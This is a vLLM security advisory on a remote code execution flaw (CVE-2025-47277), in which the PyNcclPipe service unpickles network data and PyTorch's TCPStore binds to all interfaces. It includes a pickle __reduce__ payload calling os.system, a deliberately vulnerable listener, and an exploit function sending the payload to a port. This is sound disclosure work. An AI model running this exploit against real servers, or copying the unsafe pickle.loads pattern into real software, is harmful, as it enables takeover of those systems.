Description
vLLM Allows Remote Code Execution via PyNcclPipe Communication Service
Impacted Environments
This issue ONLY impacts environments using the `PyNcclPipe` KV cache transfer integration with the V0 engine. No other configurations are affected.
Summary
vLLM supports the use of the `PyNcclPipe` class to establish a peer-to-peer communication domain for data transmission between distributed nodes. GPU-side KV-Cache transmission is implemented through the `PyNcclCommunicator` class, while CPU-side control message passing is handled via the `send_obj` and `recv_obj` methods.
A remote code execution vulnerability exists in the `PyNcclPipe` service. An attacker can exploit it by sending malicious serialized data to gain control of the server.
The intention was that this interface be exposed only to a private network, using the IP address specified by the `--kv-ip` CLI parameter. The vLLM documentation covers how this must be limited to a secured network: https://docs.vllm.ai/en/latest/deployment/security.html
Unfortunately, PyTorch's default behavior is that the `TCPStore` interface listens on ALL interfaces, regardless of what IP address is provided; the given IP address is only used as a client-side address. vLLM was fixed with a workaround that forces the `TCPStore` instance to bind its socket to the specified private interface.
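The difference between the default behavior and the fix can be illustrated with plain Python sockets (a stand-alone sketch, not PyTorch's or vLLM's actual code):

```python
import socket

def bound_interface(bind_host: str) -> str:
    """Bind a TCP listener and report which address it is bound to."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # Port 0 lets the OS pick a free port; only the host part matters here.
    s.bind((bind_host, 0))
    host, _port = s.getsockname()
    s.close()
    return host

# "0.0.0.0" accepts connections on every interface -- analogous to the
# TCPStore default. An explicit private address such as "127.0.0.1"
# restricts the listener, which is what the vLLM fix enforces.
print(bound_interface("0.0.0.0"))
print(bound_interface("127.0.0.1"))
```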
This issue was reported privately to PyTorch and they determined that this behavior was intentional.
Details
The `PyNcclPipe` implementation contains a critical security flaw: it directly processes client-provided data using `pickle.loads`, creating an unsafe-deserialization vulnerability that can lead to remote code execution.
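Why `pickle.loads` on untrusted bytes amounts to code execution, in miniature: a pickle stream can name any importable callable via `__reduce__`, and deserialization invokes it. (Self-contained illustration; the command here is harmless.)

```python
import os
import pickle

class Evil:
    # __reduce__ tells pickle how to "reconstruct" the object; an attacker
    # substitutes an arbitrary callable plus arguments, e.g. os.system.
    def __reduce__(self):
        return (os.system, ("echo pwned",))

blob = pickle.dumps(Evil())   # the wire bytes an attacker would send
status = pickle.loads(blob)   # deserialization runs `echo pwned` in a shell
```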
- Deploy a `PyNcclPipe` service configured to listen on port 18888 when launched:
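The advisory's original launch snippet is not reproduced here; as a stand-in, the vulnerable pattern can be sketched with plain sockets (hypothetical code, not vLLM's actual `PyNcclPipe` implementation — port 18888 is the advisory's example):

```python
import pickle
import socket

def run_vulnerable_service(port: int):
    """Accept one connection and pickle.loads whatever the client sends."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("0.0.0.0", port))   # all interfaces, like the TCPStore default
    srv.listen(1)
    conn, _addr = srv.accept()
    data = conn.recv(1 << 16)
    conn.close()
    srv.close()
    # The flaw: attacker-controlled bytes go straight into pickle.loads.
    return pickle.loads(data)
```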
- The attacker crafts malicious packets and sends them to the `PyNcclPipe` service:
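The attacker side can likewise be sketched with stdlib-only code (a hypothetical delivery over a raw socket; a real exploit would speak the service's actual wire format):

```python
import os
import pickle
import socket

class MaliciousPayload:
    # On pickle.loads, the victim process calls os.system("id").
    def __reduce__(self):
        return (os.system, ("id",))

def exploit(host: str, port: int) -> None:
    """Serialize the payload and ship the raw pickle bytes to the service."""
    blob = pickle.dumps(MaliciousPayload())
    with socket.create_connection((host, port)) as s:
        s.sendall(blob)

# exploit("victim.internal", 18888)  # hypothetical target host; advisory's port
```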
The resulting call stack ends in `pickle.loads` on the attacker-controlled bytes, at which point the attacker can pop a shell on the server.
Reporters
This issue was reported independently by three different parties:
- @kikayli (Zhuque Lab, Tencent)
- @omjeki
- Russell Bryant (@russellb)
Fix
- https://github.com/vllm-project/vllm/pull/15988 -- vLLM now limits the `TCPStore` socket to the private interface as configured.
References
- https://github.com/vllm-project/vllm/security/advisories/GHSA-hjq4-87xh-g4fv
- https://nvd.nist.gov/vuln/detail/CVE-2025-47277
- https://github.com/vllm-project/vllm/pull/15988
- https://github.com/vllm-project/vllm/commit/0d6e187e88874c39cda7409cf673f9e6546893e7
- https://docs.vllm.ai/en/latest/deployment/security.html
Packages
Package: vllm
Affected versions: >= 0.6.5, < 0.8.5
Patched version: 0.8.5